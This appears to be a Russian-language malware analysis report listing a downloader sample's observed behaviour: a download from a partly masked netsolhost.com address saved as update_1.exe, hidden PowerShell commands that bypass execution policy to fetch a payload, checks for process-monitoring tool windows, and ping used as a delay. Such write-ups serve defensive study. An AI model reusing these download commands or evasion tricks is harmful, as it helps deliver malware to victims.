Техническая информация
- Загружает файл http://03#####.netsolhost.com/aspnet_client/system_web/1_1_4322/x.d и сохраняет его как %temp%\update_1.exe
- nul
- DNS ASK 03#####.netsolhost.com
- Окна, которые ищет образец (судя по заголовкам — утилиты мониторинга процессов):
- ClassName: '' WindowName: 'Task Manager'
- ClassName: '' WindowName: 'Windows Task-Manager'
- ClassName: '' WindowName: 'Windows Task Manager'
- ClassName: '' WindowName: 'Resource Monitor'
- ClassName: '' WindowName: 'Process Hacker'
- ClassName: '' WindowName: 'Process Explorer'
- ClassName: '' WindowName: 'System Explorer'
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://03#####.netsolhost.com/aspnet_c...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c <SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://03#####.netsolhost.com/aspnet_c...
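- '%WINDIR%\syswow64\ping.exe' -n 21 127.0.0.1
- '%WINDIR%\syswow64\ping.exe' -n 31 127.0.0.1 (оба вызова обращаются к локальному адресу; вероятно, ping используется здесь как задержка выполнения)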